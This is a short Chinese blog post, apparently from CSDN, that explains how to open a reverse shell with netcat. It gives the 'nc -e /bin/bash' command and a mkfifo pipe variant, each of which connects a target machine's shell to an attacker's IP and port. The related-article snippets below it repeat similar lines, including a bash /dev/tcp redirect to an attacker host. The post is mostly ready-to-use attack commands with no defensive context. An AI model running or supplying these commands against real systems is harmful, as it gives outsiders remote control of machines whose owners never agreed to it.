使用 `nc` (netcat) 进行 shell 反弹

最新推荐文章于 2025-06-02 13:29:35 发布

suanfa_student

最新推荐文章于 2025-06-02 13:29:35 发布

阅读量205

点赞数 1

CC 4.0 BY-SA版权

文章标签：服务器 linux 运维

本文链接：https://blog.youkuaiyun.com/suanfa_student/article/details/145658925

使用 `nc` (netcat) 进行 shell 反弹

如果目标系统安装了 nc，可以使用 netcat 来建立反向 shell：

nc -e /bin/bash 你的IP地址 端口号

你的IP地址 是监听端的 IP 地址
端口号 是监听的端口
-e 参数将 /bin/bash 作为程序执行

如果目标系统的 nc 不支持 -e 参数（一些现代版本的 netcat 已经移除了这个功能），可以使用以下方式：

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 你的IP地址 端口号 > /tmp/f

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

suanfa_student

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[ 隧道技术 ] 反弹shell的集中常见方式（一）nc反弹shell

qq_51577576的博客

08-03

2295

攻击者机器 192.168.3.27 和靶机 192.168.3.29 可以相互的访问，这个时候可以使用正向shell攻击者机器 192.168.3.27 不能直接访问靶机，但是靶机 192.168.3.29 可以访问攻击者的机器，这个时候使用反向shell。...

Netcat 的反向连接与反弹 Shell

Kali与编程

02-17

1788

在反向连接中，攻击者首先在自己的主机上启动一个监听程序，然后在目标主机上执行一个连接程序，该连接程序会连接到攻击者主机上的监听程序，并建立一个反向连接。在反向连接中，攻击者首先在自己的主机上启动一个监听程序，然后在目标主机上执行一个连接程序，该连接程序会连接到攻击者主机上的监听程序，并建立一个反向连接。假设我们要在目标主机上执行一个连接程序，连接到攻击者主机的IP地址为192.168.1.100，端口号为1234的监听程序，并执行一个shell。在目标主机上执行连接程序，并连接到攻击者主机的监听程序。

参与评论您还未登录，请先登录后发表或查看评论

NC / Netcat - 反弹Shell

dieman0446的博客

02-06

297

原理实验环境：攻击机：windows机器，IP:192.168.12.109 受害机：linux机器，IP:192.168.79.1 攻击机：设置本地监听端口2222 C:\netcat>nc -l -p 2222 受害机：反弹/bin/bash 到攻击机（192.168.12.109）的2222端口 roo...

反弹 Shell（Reverse Shell）原理与实战详解

最新发布

chaoqun3的博客

06-02

1399

反弹 Shell 是指被控主机主动向攻击者主机发起连接请求，建立一个 TCP 或 UDP 连接后，攻击者可以通过这个连接执行命令并获取输出结果，从而实现远程控制。Netcat 被称为“网络瑞士军刀”，是一款强大的网络调试和数据传输工具。它可以用于创建 TCP/UDP 连接、监听端口、发送文件等。在被控机器上启动一个交互式 shell；将其所有输出（stdout 和 stderr）发送给攻击者；将攻击者作为输入源（stdin），实现远程控制。核心要点描述反弹 Shell 的本质。

netcat反弹shell

iteye_16188的博客

09-01

812

注意：如果想要在小于1024的端口做监听，那么需要root权限一)通用场合 1. 自己机器：nc —nvlp 443 2. 目标机：nc attacker'sIP 443 —e /bin/bash -n：不解析域名 -v：显示连接信息 -l：处于监听状态 -p：端口号(有时需要单独把-p选项拿出来) 二）如果不支持-e选项：如果代码编译的时候没有指定GAPING_SECURITY_...

netcat 反弹shell

weixin_40328085的博客

09-18

413

第一种情况：用 bash -i 客户机：netcat -l -p 7777 服务器（被黑主机）：bash -i >& /dev/tcp/192.168.227.1/7777 0>&1 >& 后面跟上/dev/tcp/ip/port 这个文件代表将bash -i 的标准输出和标准错误输出重定向到这个文件（描述符）。（其实有点像个通道） 0&gt...

Netcat反弹shell

Yy10205473的博客

01-14

728

Netcat反弹shell基础介绍使用python反弹shell应用场景使用方法当nc不支持-e时如何反弹shell应用场景使用方法 #应用场景某些拿到服务器权限之后，想要设置一个反弹shell。但是目标服务器上没有安装nc时。基础介绍将liunx系统下的bash（shell）传递到window系统下的pc 反弹shell：bash -i >& /dev/tcp/IP地址/端口 0>&1 liunx主机连接window主机 bash -i ：已交互模式运行bash she

【工具】Netcat（2）反弹shell

爱美食的Geek

02-21

3045

应用场景：某些拿到服务器权限之后，想要设置一个反弹shell。但是目标服务器上没有安装Netcat时。 1.反弹shell（bash) 反弹shell命令:bash -i >& /dev/tcp/ip/port 0>&1 pc接受netcat命令:nc -lvp port bash -i表示以交互模式运行bash shell。重定向符>&，如果在其后加文...

NC反弹shell

Palpitate_LL的博客

09-13

1012

c 指定连接后要执行的shell命令-e 指定连接后要执行的文件名-l 监听模式-p 设置本地使用的通信端口-u 使用UDP传输协议，默认是TCP-v 显示命令执行过程，使用-vv显示更详细信息。

使用两台主机使用 Netcat 进行正向 shell 与反弹 shell 实验。

03-26

</think>### 使用Netcat实现正向Shell与反弹Shell配置教程 --- #### **一、正向Shell（Bind Shell）** **原理**：目标主机主动绑定Shell到某个端口，攻击者连接该端口即可获得Shell权限[^2]。 **步骤**： 1. **...

Linux下NC反弹shell命令（推荐）

09-15

主要介绍了Linux下NC反弹shell命令，非常不错，具有参考借鉴价值，需要的的朋友参考下吧

Windows/Linux 下nc 反弹shell

热门推荐

SoulCat

06-11

1万+

*Windows/Linux 下nc 反弹shell 高二那年班主任对我们说：其实我并不反对你们谈恋爱, 只是你们记得要找一个有担当的, 那些一看见老师就松开你手的，要来有什么用？ NC概述: nc又名netcat，一个简单而有用的工具，可以干很多事情，但是不可以吃。何为反弹shell？为什么不反弹攻击? 相信你有一天可以直接把所有攻击反弹回去的. 何为反弹shell? 简单来说就...

NetCat反弹shell

qq_64177395的博客

11-04

651

Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通过NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作

NC反弹Shell

收集盒 Book box

08-30

3026

使用NC反弹Shell 在进行Shell反弹时，有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况，例如有的服务器只支持JSP，不支持PHP。此时，可以同样采用Windows下的经典的NC反弹Shell方法。在Windows下反弹CmdSh

nc--反弹shell

wzhua的博客

08-04

3245

nc--反弹shell，小实验

netcat使用及反弹shell

Bu2n的博客

02-20

6195

利用NC反弹shell

Chales123的博客

01-17

554

正常情况下shell只能由主机的用户使用，但是反弹shell的目的则是将自己的shell反弹给别的主机，让别的主机可以通过shell来控制自己。举例：假设我们攻击了一台主机，打开了该主机的一个端口，攻击者在自己的主机上去连接目标机器(目标ip：目标机器端口)，这是比较常规的方式，叫做正向连接。4.对于病毒、木马，受害者什么时候能中招、对方的网络环境是什么样的、什么时候开关机等情况都是未知的，所以建立一个服务端让恶意程序主动连接，才是最好的办法。2.目标主机的ip是动态改变的，不能持续控制。

使用 `nc` (netcat) 进行 shell 反弹

使用 nc (netcat) 进行 shell 反弹

使用 `nc` (netcat) 进行 shell 反弹